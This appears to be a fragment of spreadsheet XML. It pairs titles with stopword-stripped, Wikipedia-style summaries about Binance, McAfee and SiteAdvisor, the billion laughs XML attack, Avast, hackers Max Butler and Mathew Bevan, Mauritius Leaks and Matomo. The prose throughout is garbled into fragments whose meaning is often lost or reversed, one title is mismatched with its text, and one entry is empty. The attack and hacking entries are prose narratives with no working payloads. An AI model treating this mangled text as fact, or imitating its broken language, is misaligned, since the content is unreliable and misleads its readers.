compromised bound arbitration". equifax.com website separate terms arbitration clause class action waiver, but, according brian fung washington post, "it's unclear applies credit monitoring program". york attorney general eric schneiderman demanded equifax remove arbitration clause. responding arbitration-related concerns, september equifax issued statement stating response consumer inquiries, made clear arbitration clause class action waiver included equifax trustedid premier terms apply cybersecurity incident". joel winston, data protection lawyer, argued announcement disclaiming arbitration clause "means nothing" terms state "entire agreement" parties. arbitration clause later removed equifaxsecurity2017.com, equifax.com terms amended september state apply www.equifaxsecurity2017.com, www.trustedidpremier.com, www.trustedid.com exclude claims arising sites security breach arbitration.responding continuing public outrage, equifax announced september "are waiving security freeze fees next days".equifax criticized security experts registering domain name site name instead using subdomain equifax.com. september reported equifax mistakenly linking unofficial "fake" site instead breach notification site least eight separate tweets, unwittingly helping direct reported 200,000 hits imitation site. software engineer named nick sweeting created unauthorized equifax site demonstrate official site could easily confused phishing site. sweeting's site upfront visitors official, however, telling visitors entered sensitive information "you bamboozled! isnt [sic] secure site! tweet @equifax change equifax.com thousands people loose [sic] info phishing sites!" equifax apologized "confusion" deleted tweets linking site. also chinese cyberwarfare chinese espionage united states references</t>
  </si>
  <si>
    <t>Binance</t>
  </si>
  <si>
    <t>binance cryptocurrency exchange largest exchange world terms daily trading volume cryptocurrencies. founded 2017 registered cayman islands. binance founded changpeng zhao, developer previously created high frequency trading software. binance initially based china, later moved headquarters china following chinese government's increasing regulation cryptocurrency. 2021, binance investigation united states department justice internal revenue service allegations money laundering offenses. uk's financial conduct authority ordered binance stop regulated activity united kingdom june 2021.in 2021, binance shared client data, including names addresses, russian government. history changpeng zhao previously founded fusion systems 2005 shanghai; company built high-frequency trading systems stockbrokers. 2013, joined blockchain.info third member cryptocurrency wallet's team. also worked okcoin less year, platform spot trading fiat digital assets.the company founded china moved servers headquarters china japan advance chinese government cryptocurrency trading september 2017.in january 2018 largest cryptocurrency exchange market capitalization $1.3 billion, title retained april 2021, despite competition coinbase, among others.in march 2018, binance announced intentions open office malta stricter regulations japan china. april 2018, binance signed memorandum understanding government bermuda. months later, similar memorandum signed malta stock exchange develop platform trading security tokens. 2019, company announced binance jersey, independent entity parent binance.com exchange, expand european influence. jersey based exchange offers fiat-to-cryptocurrency pairs, including euro british pound.in august 2018, binance along three exchanges raised million stablecoin project. idea stable coins provide cryptocurrency without notorious volatility bitcoin popular digital assets.in january 2019, binance announced partnered israel-based payment processor simplex enable cryptocurrency purchases debit credit cards, including visa mastercard. purchases subject simplex's local bank policies limited bitcoin, ethereum, litecoin ripple's xrp.on 2019, binance revealed victim "large scale security breach" hackers stolen 7,000 bitcoin worth around u.s.$40 million time. binance changpeng zhao said hackers "used variety techniques, including phishing, viruses attacks" structured transaction passed existing security checks." binance halted withdrawals deposits allowed trading continue. site pledged reimburse customers "secure asset fund users (safu)". withdrawals resumed may.in september 2019, exchange began offering perpetual futures contracts, allowing leverage high times value contracts. november 2019, binance announced acquiring indian bitcoin exchange wazirx, became disputed august 2022 binance founder zhao claimed deal never signed.on february 2020, malta financial services authority (mfsa) issued public statement responding media reports referring binance 'malta-based' cryptocurrency company. statement noted binance authorized mfsa operate cryptocurrency sphere therefore subject regulatory oversight mfsa." mfsa added "assessing binance activities malta fall within realm regulatory oversight."in july 2020, binance announced "strategic partnership" chinese state-owned enterprise state-owned assets supervision administration commission state council binance joined group "aiming facilitate" belt road initiative.on october 2020, forbes staff released leaked documents alleging binance changpeng zhao created elaborate corporate structure designed intentionally deceive united states regulators secretly profit cryptocurrency investors located country. binance officially blocks access addresses located united states, "potential customers would taught evade geographic restrictions", forbes claimed.in 2021 reported binance investigation internal revenue service united states department justice allegations money laundering offenses.in february 2022, binance took $200m stake forbes.in march 2022, amidst 2022 russian invasion ukraine, binance's changpeng zhao, refused users russia, citing "financial freedom.". binance later softened opposition measure, also pointed donation million humanitarian needs ukraine.in april 2022, reuters reported that, 2021, binance shared information rosfinmonitoring funds raised jailed russian opposition leader alexei navalny's network.on 2022, binance announced registration legal entity italy, plans opening offices expanding local team area. changpeng zhao also shared information regarding binance's registration france's market regulator. company also seeking registration european countries, switzerland, sweden, spain, netherlands, portugal austria.on june 2022 binance announced (for unspecified time period) users would unable withdraw funds held bitcoin, amid background major falls value cryptocurrencies. hours announcing temporarily suspension bitcoin withdrawals, bitcoin withdrawals resumed. cryptocurrencies throughout history, company launched cryptocurrencies developed itself: binance coin (bnb), launched june 2017, binance smart chain (bsc), launched september 2020. binance smart chain operates using "proof staked authority", combination proof stake proof authority. approved validators. 2021, binance coin cryptocurrency third highest market capitalization. binance allows users fees exchange binance coin.bsc supports smart contracts compatible ethereum virtual machine (evm). legal status united states 2019, binance banned united states regulatory grounds. response, binance investors opened binance.us, separate exchange registered united states financial crimes enforcement network designed comply applicable laws. variant praised offering similar interface feature worldwide counterpart. however, banned states. 2021, bloomberg news reported binance investigation united states department justice internal revenue service money-laundering evasion. june 2022, securities exchange commission launched enquiry binance determine company's 2017 tokens amounted illegal sale security. united kingdom june 2021, binance ordered uk's financial conduct authority stop regulated activity united kingdom. january 2021, began requiring firms dealing cryptocurrency register order comply anti-money laundering rules. binance compliant rules, forced cease operations within coming weeks. japan june 2021, japan's financial services agency warned binance registered business japan. this second notice binance received fsa. previously, similar warning issued march 2018. france 2022, binance gained regulatory approval france, allowing company provide digital asset services country. france first european country give binance regulatory approval. germany april 2021, federal financial supervisory authority germany warned company risked fines releasing investor prospectus stock tokens issued. thailand thailand's securities exchange commission filed criminal complaint binance july 2021, "for commission offence emergency decree digital asset business b.e. 2561 (2018)". additionally, thailand's cited binance operating without license, violation section digital asset businesses emergency decree. canada march 2022, binance confirmed undertaking ontario securities commission would stop opening accounts halting trading existing accounts users ontario. netherlands april 2022, dutch central bank announced $3.35 million fine binance offering services within netherlands without registered country. fine issued company official warning issued company august 2021. india august 2022, india's enforcement directorate froze assets wazirx, exchange owned binance, part money laundering investigation. following event, zhao clarified never owned wazirx owned equity zanmai labs—the operating entity wazirx—citing issues" prevented completion acquisition. co-founder wazirx, nischal shetty, disputed zhao's claims asserting binance indeed acquired them. also bitfinex kraken coinbase notes references external links official website</t>
  </si>
  <si>
    <t>McAfee SpamKiller</t>
  </si>
  <si>
    <t>mcafee corp. ma-kə-fee), formerly known mcafee associates, inc. 1987 1997 2004 2014, network associates inc. 1997 2004, intel security group 2014 2017, american global computer security software company headquartered jose, california. company purchased intel february 2011, became part intel security division. 2017, intel strategic deal capital converted intel security joint venture companies called mcafee. thoma bravo took minority stake company, intel retained stake. owners took mcafee public nasdaq 2020, 2022 investor group advent international corporation took private again. history 1987–1999 company founded 1987 mcafee associates, named founder john mcafee, resigned company 1994. mcafee incorporated state delaware 1992. 1993, mcafee stepped head company, taking position chief technology officer eventual resignation. bill larson appointed place. network associates formed 1997 merger mcafee associates, network general, corporation helix software. 1996, mcafee acquired calgary, alberta, canada-based corporation, helped company diversify security offerings away client-based antivirus software bringing board network desktop encryption technologies. team also oversaw creation number technologies leading edge time, including firewall, file encryption, public infrastructure product lines. while product lines individual successes including powerbroker (written dean huxley freedman sold beyondtrust), growth antivirus ware always outpaced growth security product lines. fair mcafee remains best known anti-virus anti-spam products. among companies bought sold mcafee trusted information systems, developed firewall toolkit, free software foundation commercial gauntlet firewall, later sold secure computing corporation. mcafee acquired trusted information systems banner network associates 1998. mcafee, result brief ownership labs/nai labs/network associates laboratories/mcafee research, highly influential world open-source software, organization produced portions linux, freebsd, darwin operating systems, developed portions bind name server software snmp version 2000–2009 2000, mcafee/network associates leading authority educating protecting people love iloveyou virus, destructive computer viruses history.at 2000, bill larson, president peter watkins, prabhat goyal resigned company sustained losses. company president gene hodges served interim george samenuk appointed 2001.the company returned original name july 2004. restructured, beginning sale magic solutions business remedy, subsidiary software early year. mid-2004, company sold sniffer technologies business venture capital backed firm named network general (the name original owner sniffer technologies), changed name back mcafee reflect focus security-related technologies.in 2006, dale fuller became interim samenuk resigned president kevin weiss fired company accused questionable stock options practices. david dewalt took april 2007.in 2007, mcafee launched security innovation alliance (sia), program focused cultivating partnerships tech companies integrating third-party technology mcafee’s security compliance risk management technology. march 2008, mcafee announced license agreement department defense. this agreement allowed integrate mcafee’s virus scan enterprise anti-spyware enterprise defense information systems agency’s cyber-security solutions. 2010–present august 2010, intel announced would purchase mcafee share deal valued $7.68 billion. september 2016, intel announced strategic partnership turn mcafee independent cyber-security company joint venture. that deal closed april 2017.ceo david dewalt resigned 2011, mcafee appointed michael decesare todd gebhart co-presidents. 2011, mcafee also partnered saic develop anti-cyber espionage products government intelligence agencies, along telecommunications companies.on january 2014, intel brian krzanich announced consumer electronics show name change mcafee security intel security. company's shield logo would remain, firm continuing operate wholly owned intel subsidiary. john mcafee, longer involvement company, expressed pleasure name longer associated software. however, 2016 products still bore mcafee name. september 2016, intel sold majority stake entered agreement turn intel security jointly-owned, independent cyber-security company mcafee name.after deal companies closed, company spun back intel april 2017."chris young assumed position company became independent entity.in 2018, company unsuccessfully entered talks sell majority control mcafee minority stakeholder thoma bravo.in 2018, mcafee also expanded security innovation alliance partnerships include companies atos, cyberx, fidelis cyber-security, aujas, silver peak.in july 2019, mcafee began meeting bankers discuss returning market ipo.as ipo, company estimated valued billion higher. however, deal decision join public market confirmed.near 2019, mcafee partnered google cloud integrate mcafee’s mvision cloud endpoint security technology google’s cloud infrastructure.in october 2020, mcafee shareholders raised $740 million initial public offering valued $8.6 billion based outstanding shares listed prospectus. mcafee shares traded nasdaq stock exchange ticker symbol mcfe, marked return public market years. 2020, former mcafee chris young left position replaced peter leav. however, stock delisted nasdaq company taken private march 2022 multi-national investor group advent international corporation, consisting canada pension plan, singaporean private limited, dhabi investment authority.in 2022, peter leav stepped mcafee named greg johnson ceo. products mcafee primarily develops digital-security tools personal computers server devices, recently, mobile devices. mcafee brands, products sub-products include: current productsmcafee total protection mcafee livesafe mcafee safe connect mcafee mobile security android mcafee mobile security mcafee virus removal service mcafee identity theft protection mcafee gamer security mcafee safe family mcafee reputation technology mcafee small business security mcafee personal data clean-uprenamed productsmcafee virusscan enterprise (changed mcafee virusscan) mcafee network security platform (changed intrushield) mcafee application change control (changed mcafee change control) mcafee webadvisor instead siteadvisorformer productsmcafee e-business server mcafee entercept acquisitions solomon's group plcon june 1998, network associates agreed acquire solomon's group plc, leading european manufacturer antivirus software, $642 million stock. intruvert networkson april 2003, mcafee acquired intruvert networks $100 million. according network world, "intruvert's technology focus intrusion-prevention, entails detecting attacks, blocking them. intruvert product line used passive intrusion-detection system, watching reporting, used intrusion-prevention mode blocking perceived attack." foundstonein august 2004, mcafee agreed acquire foundstone, vendor security consulting, training, vulnerability management software, million. siteadvisoron april 2006, mcafee bought siteadvisor reputed million competition symantec, service warns users downloading software filling forms site obtain malware spam. preventsyson june 2006, mcafee announced would acquire preventsys, california-based company offering security risk management products. acquisition cost mcafee million. onigma ltdon october 2006, mcafee announced would acquire israel based onigma million. onigma provides host-based data leakage protection software prevents intentional unintentional leakage sensitive data internal users. safeboot holding b.v.on october 2007, mcafee announced would acquire safeboot holding b.v. $350 million. safeboot provided mobile data security solutions protected data, devices, networks risk associated loss, theft, unauthorized access. through acquisition, mcafee became vendor deliver endpoint, network, web, email data security, well risk compliance solutions. gerhard watzinger, safeboot, joined mcafee lead data protection product business unit. deal closed november 2007. scanalerton october 2007, mcafee announced plans acquire scanalert million. acquisition integrated scanalert's hacker safe service mcafee's siteadvisor rating system attack website security sides. industry's first service help consumers stay safe searched, surfed shopped. deal closed february 2008. reconnexon july 2008, mcafee announced would acquire reconnex, maker data protection appliances software. reconnex sold data loss prevention software, designed prevent sensitive documents data leaving corporate networks. acquisition added content awareness mcafee's data security portfolio. million deal closed august 2008. secure computingon september 2008, mcafee announced agreement acquire secure computing, company specializing network security hardware, services, software products. acquisition expanded mcafee's business securing networks cloud computing services offer comprehensive brand products. deal closed november 2008 price $497 million. endeavorin january 2009, mcafee announced plans acquire endeavor security, privately held maker ips/ids technology. deal closed february 2009 total purchase price $3.2 million. solidcore systemson 2009, mcafee announced intention acquire solidcore systems, privately held security company, million. solidcore maker software helped companies protect atms specialized computers. acquisition integrated solidcore's whitelisting compliance enforcement mechanisms mcafee product line. deal closed june 2009. logicon july 2009, mcafee announced plans acquire managed email security vendor logic. acquisition provided enhanced range saas-based security services cloud-based intelligence, security, email security, endpoint security vulnerability assessment. deal closed september 2009 price $140 million. logic staff integrated mcafee's saas business unit. trust digitalon 2010, mcafee announced definitive agreement acquire trust digital, privately held online security company specialized security mobile devices. acquisition allowed mcafee extend services beyond traditional endpoint security move mobile security market. acquisition closed june 2010. price trust digital disclosed. tencubeon july 2010, mcafee announced definitive agreement acquire tencube, privately held online security company specialized anti-theft data security mobile devices. acquisition allowed mcafee complete diversification mobile security space, announce plans build next generation mobile platform. acquisition closed august 2010. sentrigoon march 2011, mcafee announced intention acquire privately owned sentrigo, leading provider database security, including vulnerability management, database activity monitoring, database audit, virtual patching—which ensure databases protected without impacting performance availability. acquisition enabled mcafee extend database security portfolio. acquisition closed april 2011. nitrosecurityon october 2011, mcafee announced intention acquire privately owned nitrosecurity, developer high-performance security information event management (siem) solutions protect critical information infrastructure. nitrosecurity solutions reduce risk exposure increase network information availability removing scalability performance limitations security information management. acquisition closed november 2011. validedgeon february 2013, mcafee announced acquired validedge sandboxing technology. stonesofton july 2013 mcafee completed tender offer finnish network firewall design company stonesoft worth $389 million cash, $6.09 share. next generation firewall business acquired stonesoft divested forcepoint january 2016. passwordboxon december 2014, intel security announced acquisition passwordbox, montreal-based provider digital identity management solutions. financial terms disclosed. skyhigh networksin november 2017, mcafee acquired skyhigh networks, casb security company. acquisition closed january 2018. march 2021, symphony technology group acquired mcafee enterprise, including skyhigh networks. january 2022, announced mcafee enterprise's security service edge (sse) business would operate separate company known skyhigh security, built mcafee enterprise skyhigh networks. tunnelbearin march 2018, mcafee acquired tunnelbear, canadian service. uplevel securityin july 2019, uplevel security, data analytics company using graph theory machine learning, announced acquired mcafee. nanosecin august 2019, mcafee acquired nanosec, container security company. lightpoint securityin march 2020, mcafee acquired lightpoint security, extend capabilities multiple mcafee products. amount acquisition remains undisclosed. controversies channel stuffing lawsuit: january 2006, securities exchange commission filed suit mcafee overstating 1998–2000 revenue us$622,000,000. without admitting wrongdoing, mcafee simultaneously settled complaint, agreed million penalty rework accounting practices. fine accounting fraud; known channel stuffing served inflate revenue investors.sec investigation share options: october 2006, mcafee fired president kevin weiss, george samaneuk resigned cloud recent investigation also caused departure kent roberts, general counsel, earlier year. late december 2006 weiss samaneuk share option grant prices revised upwards mcafee's board. weiss roberts exonerated wrongdoing claims mcafee 2009.dat 5958 update: april 2010, beginning approximately 14:00 utc, millions computers worldwide running windows service pack affected erroneous virus definition file update mcafee, resulting removal windows system file (svchost.exe) machines, causing machines lose network access and, cases, enter reboot loop. mcafee rectified removing replacing faulty file, version 5958, emergency file, version 5959 posted affected machines consumer knowledge base. university michigan's medical school reported 8,000 25,000 computers crashed. police lexington, ky., resorted hand-writing reports turned patrol terminals precaution. some jails canceled visitation, rhode island hospitals turned away non-trauma patients emergency rooms postponed elective surgeries. australian supermarket coles reported (1,100) point-of-sales terminals affected forced shut stores western southern parts country. result outage, mcafee implemented additional protocols releases directly impacted critical system files. company also rolled additional capabilities artemis provide another level protection false positives leveraging whitelist hands-off system files.dat 6807-6808 update: august 2012, issue update mcafee antivirus home enterprise computers turned antivirus protection and, many cases, prevented connection internet. mcafee criticized slow address problem, forcing network operations spend time diagnosing issue. also internet security comparison antivirus software comparison firewalls references external links official website</t>
  </si>
  <si>
    <t>McAfee SiteAdvisor</t>
  </si>
  <si>
    <t>mcafee siteadvisor, later renamed mcafee webadvisor, service reports safety sites crawling testing sites finds malware spam. browser extension show ratings hyperlinks search results. users could formerly submit reviews sites.the service originally developed siteadvisor, inc, startup first introduced codecon february 2006, later acquired mcafee april 2006. since founding, received criticism improper rating sites, importantly length time takes resolve complaints. usage prior mid-october 2014, functionality siteadvisor could accessed submitting website https://www.siteadvisor.com/sites/, also accessed downloadable browser plugin.sites rated levels safe (green tick), suspicious (yellow exclamation mark) unsafe (red "x"). additional features include: rates email links indicates sites potentially harmful computer allows users safely shorten urls sharing links alerts users possible phishing identity theft scams redirects away yellow sites protected mode enabled). products services paid version mcafee siteadvisor, mcafee siteadvisor live, included mcafee total protection extra features: download protection siteadvisor live allows consumer adjust aggressively siteadvisor scans downloads. this stop downloads considered slightly, probably possibly risky depending setting determined user. this feature also turned off. protected mode allows user password siteadvisor prevent users accessing downloading yellow rated websites. this password also required change siteadvisor settings protected mode enabled.in addition selling consumers, 2017, mcafee also sells site owners mcafee secure program, supposedly runs daily security checks gives passing sites "mcafee secure" badge.as december 2010, mcafee secure marketing materials million installs mcafee siteadvisor, likely much larger viewer base search engine agreements yahoo. shortening service advertised "secure" operated mid-2018. defining feature would deny redirecting sites classified siteadvisor insecure, provide users receiving "mcaf.ee" confidence would land malicious site. games quizzes march 2006, mcafee launched javascript-based quiz users pick sites rated safe unsafe.a flash-based memory training game called "webquest" launched around 2007. studies research siteadvisor published various reports regarding online threats typosquatting, mistyped domains lead sites ranging harmless pay-per-click domain parking sites pornographic malware sites. criticism false negatives nature siteadvisor long periods site crawls mean even siteadvisor tests 100% accurate green rating offers guarantee safety. malicious code browser exploits often spread fast large numbers websites, meaning green rating date provide false sense security. trustedsource mcafee siteadvisor makes trustedsource website reputation organisation, something like 'cloud' intelligence software up-to-date information websites possible, similar mcafee's active protection (artemis) system. details system known. awards time magazine named siteadvisor.com among coolest websites 2006. popular science awarded siteadvisor "best what's new" award computing category 2006. world ranked siteadvisor "the best products 2007." also norton safe website reputation ratings wot: trust references external links official website safe report example (wikipedia) cautionary report example (whenu.com) warning report example (sify-antispyware.co.cc)</t>
  </si>
  <si>
    <t>Billion laughs attack</t>
  </si>
  <si>
    <t>computer security, billion laughs attack type denial-of-service (dos) attack aimed parsers documents.it also referred bomb exponential entity expansion attack. details example attack consists defining entities, defined consisting previous entity, document consisting single instance largest entity, expands billion copies first entity. frequently cited example, first entity string "lol", hence name "billion laughs". time vulnerability first reported, computer memory used billion instances string "lol" would likely exceed available process parsing xml. while original form attack aimed specifically parsers, term applicable similar subjects well.the problem first reported early 2002, began widely addressed 2008.defenses kind attack include capping memory allocated individual parser loss document acceptable, treating entities symbolically expanding lazily (and extent) content used. code example when parser loads document, sees includes root element, "lolz", contains text "&amp;lol9;". however, "&amp;lol9;" defined entity expands string containing "&amp;lol8;" strings. each "&amp;lol8;" string defined entity expands "&amp;lol7;" strings, after entity expansions processed, small block actually contain billion "lol"s, taking almost gigabytes memory. variations billion laughs attack described take exponential amount space time. quadratic blowup variation causes quadratic growth resource requirements simply repeating large entity again, avoid countermeasures detect heavily nested entities. (see computational complexity theory comparisons different growth classes.) "billion laughs" attack could exist file format contain macro expansions, example yaml bomb: this crashed earlier versions yaml processor (contrary yaml spec) expands references macros. yaml processor modified fail parsing result object becomes large. enterprise software like kubernetes affected attack yaml parser. reason, file formats allow references often preferred data arriving untrusted sources. also fork bomb: similar method exhaust system's resources recursion bomb: similar attack utilizing archives external entity attack: attack return arbitrary server files document type definition: template validating files references</t>
  </si>
  <si>
    <t>McAfee Associates</t>
  </si>
  <si>
    <t>List of community currencies in the United Kingdom</t>
  </si>
  <si>
    <t>this article list community currencies are, been, used united kingdom. there various models complementary currencies, local currencies, local exchange trading systems (lets) time-based currency: also barter list community currencies canada list community currencies united states references</t>
  </si>
  <si>
    <t>Avast Antivirus</t>
  </si>
  <si>
    <t>avast antivirus family cross-platform internet security applications developed avast microsoft windows, macos, android ios. avast antivirus products include freeware paid versions provide computer security, browser security, antivirus software, firewall, anti-phishing, antispyware, anti-spam among services.avast launched freeware business product, avast business, february 2015. cross-platform solution includes antivirus protection, threat scanning, browser protection, cloud management console.as 2017, avast popular antivirus vendor market, largest share market antivirus applications.in february 2018, test various antimalware products av-test, avast free antivirus earned points "protection" category, detecting 100% malware samples used test earning "av-test certified" seal. avast's mobile security antivirus detected 100% malware samples january 2018 test android malware av-comparatives.in january 2020, multiple news sources reported avast antivirus, subsidiary, selling browsing history avast free product users. though company claimed data "de-identified", reported sold data could linked back people's real identities, exposing every click search made, could verified. response, avast announced would close subsidiary data privacy backlash. also avast secure browser avast secureline comparison antivirus software references</t>
  </si>
  <si>
    <t>Max Butler</t>
  </si>
  <si>
    <t>vision (formerly butler, alias iceman) former computer security consultant hacker served 13-year prison sentence, longest sentence ever given time hacking charges united states. convicted counts wire fraud, including stealing nearly million credit card numbers running million fraudulent charges. early life butler born july 1972, grew meridian, idaho younger sibling; parents divorced father vietnam veteran computer store owner married daughter ukrainian immigrants. teenager, butler became interested bulletin board systems hacking. junior year, butler broke high school stole chemistry lab; later diagnosed bipolar disorder. pleaded guilty malicious injury property, first-degree burglary, grand theft. ultimately received probation crimes, sent live father, transferred bishop kelly high school. first offense butler attended boise state university year. 1991, butler convicted assault freshman year college. appeal unsuccessful procedural grounds, judge ruled butler's defense attorney raise issue earlier appeal. idaho state penitentiary paroled butler april 1995. professional personal life butler moved father near seattle worked part-time technical support positions various companies. discovered internet relay chat frequently downloaded warez, illegally downloaded software media. after internet service provider littleton, colorado traced butler's uploads warez unprotected file transfer protocol server –the uploads consuming excessive bandwidth–to compuserve corporate offices bellevue, washington, compuserve fired butler.after moving half moon bay, california, changed last name vision lived rented mansion "hungry manor" group computer enthusiasts. butler became system administrator computer gaming start-up mpath interactive. software publishers association filed $300,000 lawsuit butler engaging unauthorized distribution software compuserve's office later settled case $3,500 free computer consulting. after marrying kimi winters, moved berkeley, california, worked freelance pentester security consultant. during time, developed online community resource called "advanced reference archive current heuristics network intrusion detection systems," arachnids.' investigation, guilty plea, sentencing spring 1998, butler installed backdoor onto american federal government websites trying security hole bind server daemon. however, investigator united states force found butler pop-up notifications. hired attorney jennifer granick legal representation hearing granick speak con. september 2000, butler pleaded guilty gaining unauthorized access defense department computers. starting 2001, butler served 18-month federal prison sentence handed district judge james ware.after release prison 2003 supervised release, butler exploited wi-fi technology commit cyberattacks anonymously along chris aragon francisco. advanced programming malware, allowing bifrost trojan horse evade virus scanner programs exploited html application feature internet explorer steal american express credit card information. butler also targeted citibank using trojan horse towards credit card identity thief began distributing pins aragon, would others withdraw maximum daily amount cash atms compromised account empty.arrested 2007, butler accused operating cardersmarket, forum cyber criminals bought sold sensitive data credit card numbers. after pleading guilty counts wire fraud, stealing nearly million credit card numbers, used million fraudulent purchases, butler sentenced years prison, longest sentence ever given hacking charges united states america time. after prison, butler also face years supervised release ordered $27.5 million restitution victims.butler released victorville medium april 2021. butler's story featured episode cnbc television program american greed 2010. references further reading kevin poulsen, kingpin: hacker took over billion-dollar cybercrime underground, 2011, publisher: crown. isbn 0-307-58868-8 misha glenny, darkmarket: hackers became mafia, 2012, publisher: vintage. isbn 0307476448</t>
  </si>
  <si>
    <t>Mauritius Leaks</t>
  </si>
  <si>
    <t>mauritius leaks report datajournalistic investigation international consortium investigative journalists (icij) 2019 former british colony mauritius transformed thriving financial centre haven.a whistleblower leaked documents firm mauritius investigative journalists, providing insight multinational companies avoid paying taxes business africa, middle east, asia. leak contents report considered evidence laws country mauritius help corporations avoid taxes globally, including continent africa, resulting loss billions dollars year complex, legal treaties shell corporations. heart icij investigation firm conyers dill pearman offices bermuda, hong kong, cayman islands mauritius. more 200,000 leaked legal documents anonymously sent investigative journalists, exposing avoidance evasion processes.the ai-assisted investigative journalism project involved reporters countries around world coordinating online many months encrypted workspace built icij.based large number records since early 1990s, investigation revealed financial system based island diverted revenue poor nations back western corporations “tax treaties” mostly poorer countries, including nigeria india. according conyers confidential papers “illegally obtained”.in january 2019 (before scandal), mauritius overhauled laws governing offshore sector years complaints treaty partners pressure international institutions. companies mentioned mauritius leaks among others aircastle pegasus capital advisers, miles, private equity firm established live campaigner geldof, aiming generate profits buying stakes african businesses. response mauritius immediately investigation published, government mauritius denied many investigation's allegations. pointed recent legal reforms, claimed laws allow corporations siphon away money would otherwise countries' taxes. instead, accused associated reporters seeking damage country's reputation, acquiring information contained report illegally, focusing "obsolete information." government mauritius passed major reforms since report published, instead emphasizing reforms passed early 2019. international response leaks also prompted responses dozens countries mentioned documents. journalists affected countries published individual reports locally relevant information revealed reports. botswana, california-based mapping company operated mauritian shell corporation whose sole purpose was, according documents found leak, benefit double taxation avoidance agreements between mauritius countries" including botswana. similar reports came regarding activities companies based uganda, nigeria, tanzania, india, united kingdom, united states, netherlands, thailand, namibia. even scandal, reform advocates called african countries emulate mauritius' code--in report, senior associate pricewaterhousecoopers recommended tanzania take similar policies. also multinational avoidance offshore financial centre corporate panama papers paradise papers pandora papers bahamas leaks swiss leaks artificial intelligence fincen files corruption mauritius references external links official website</t>
  </si>
  <si>
    <t>Matomo (software)</t>
  </si>
  <si>
    <t>matomo, formerly piwik (pronounced common free open source analytics application track online visits websites display reports visits analysis. features matomo developed team international developers runs php/mysql webserver. translated languages.new versions released regularly. usage july 2022, matomo used million websites, representing websites known traffic analysis tools global websites.it's recommended used various public administrations including cnil, european commission italian government. history piwik released late 2007 replacement phpmyvisites, full support, cleaner modern graphs, better architecture better performance.on november 2008, sourceforge announced availability piwik hosted application developers.piwik selected sourceforge's project month july 2009.in august 2009, piwik named among best open source enterprise infoworld's 2009 bossie awards.in december 2012, piwik started crowdfunding requested features.in september 2013, matthieu aubry maciej zawadziński, clearcode, founded piwik pro. provided support features open source piwik. clearcode bought matthieu aubry june 2016 become sole owner piwik pro.in january 2018, piwik officially renamed matomo.in late 2019, matomo released wordpress plugin called matomo analytics, allowed wordpress users host open source analytics platform directly wordpress installation. also awstats open analytics list analytics software references external links official website matomo-org github</t>
  </si>
  <si>
    <t>Mathew Bevan</t>
  </si>
  <si>
    <t>mathew bevan (born june 1974) british hacker cardiff, wales. 1996 arrested hacking secure u.s. government networks handle kuji. hacked files griffiss force base research laboratory york.intent proving conspiracy theory; sole tool commodore amiga loaded blueboxing program called roxbox. hackers said nearly started third world war. according supervisory special agent christy, time working force office special investigations background bullied peers, bevan difficult time school turned online world night escape. having told ways negate phone system, could call anywhere world without charges appearing bill. bevan began lead double-life, normal school life followed well-publicized nocturnal activities. june 1996 arrested connection hacking incidents relating several sensitive usaf, nasa, nato establishments. united states senate already misinterpreted situation branded bevan's pseudonym kuji "foreign agent, possibly eastern european origin".a u.s. force investigator summed risks concerns brought hacking, bevan's alleged partner richard pryce (datastream cowboy), years old, hacked research facility korea, dumped contents korean atomic research institute's database usaf system. concern north korea noticed, would think transfer data intrusion u.s. force, threaten physical retaliation espionage; fortunately turned south korean data, significantly less volatile. woolwich crown court, friday november 1997 months later, decided longer public interest pursue case. they offered evidence' resulted full acquittal recorded. used live devizes, wiltshire. bevan commented gary mckinnon case similar own. references external links kuji media corporation (archive news stories relating case) noaa list several hackers u.s. government systems article mathew bevan george smith, ph.d. crypt newsletter lengthy interview citing history case along spots</t>
  </si>
  <si>
    <t>Avast</t>
  </si>
  <si>
    <t>avast software s.r.o. czech multinational cybersecurity software company headquartered prague, czech republic researches develops computer security software, machine learning artificial intelligence. avast million monthly active users second largest market share among anti-malware application vendors worldwide april 2020. company approximately 1,700 employees across offices worldwide. july 2021, nortonlifelock, american cybersecurity company, announced talks merge avast software. august 2021, avast's board directors agreed offer us$8 billion.avast founded pavel baudiš eduard kučera 1988 cooperative. private company since 2010 2018. july 2016, avast acquired competitor technologies $1.3 billion. time, third-ranked antivirus product. dual-listed prague stock exchange london stock exchange constituent ftse index.the company's main product avast antivirus along tools avast secure browser avast secureline vpn. avast produces avast online security, main extension, also extensions like avast safeprice avast passwords. history avast founded eduard kučera pavel baudiš 1988. founders research institute mathematical machines czechoslovakia. they studied math computer science, communist party czechoslovakia would require join communist party study physics. institute, pavel baudiš discovered vienna virus floppy disk developed first program remove afterwards, asked eduard kucera join cofounding avast cooperative. cooperative originally called alwil software named avast.the cooperative changed joint partnership 1991, years velvet revolution caused regime change czechoslovakia. regime severed ties soviet union reverted country's economic system market economy. 1995, avast employee ondřej vlček wrote first antivirus program windows operating system. 1990s security researchers virus bulletin, security testing organization, gave avast software award every category tested, increasing popularity software. however, late 1990s, company struggling financially. alwil rebuffed acquisition offers mcafee, licensing avast antivirus engine.by 2001, alwil experiencing financial difficulties, converted freemium model, offering base avast software product cost. result freemium model, number users software grew million 2004 million 2006. former symantec executive vince steckler appointed avast 2009. 2010, alwil changed name avast, adopting name software, raised $100 million venture capital investments. following december, avast filed initial public offering, withdrew application following july, citing changes market conditions. 2012, avast fired outsourced tech support service iyogi, discovered iyogi using misleading sales tactics persuade customers unnecessary services. 2013, avast million users countries translated languages. time, company employees.in 2014, capital bought interest avast undisclosed sum. purchase valued avast billion. later year, avast acquired mobile developer inmite order build avast's mobile apps. additionally, 2014 avast's online support forum compromised, exposing 400,000 names, passwords email addresses. 2015, avast largest share market antivirus software. july 2016, avast reached agreement $1.3 billion. large security company sold software desktops mobile devices. july 2017, avast acquired uk-based piriform undisclosed sum. piriform developer ccleaner. shortly afterwards disclosed someone created malicious version ccleaner backdoor hackers. avast london stock exchange 2018, valued £2.4bn uk's biggest technology listings.ondřej vlček assumed role co-owner avast july 2019. later, changed annual pledged board director's compensation $100,000 charity. october 2019 jaya baloo joined avast chief information security officer.in april 2020, avast released secure, private mobile browser android based technology acquired previously unreported acquisition tenta, seattle-based startup.in july 2021, nortonlifelock, american cybersecurity company, announced talks merge avast software. august 2021, avast's board directors agreed offer us$8 billion. obtaining necessary shareholder approvals antitrust consents means transaction unlikely completed mid-2022.on september 2021, avast changed brand identity, scope "protecting digital freedom online citizens". products avast develops markets business consumer security products servers, desktops, mobile devices. company sells avast product line acquired avg-branded products. late 2017, company merged avast business product lines working integrate corporate departments companies. additionally, avast developed utility software products improve battery life mobile devices, cleanup 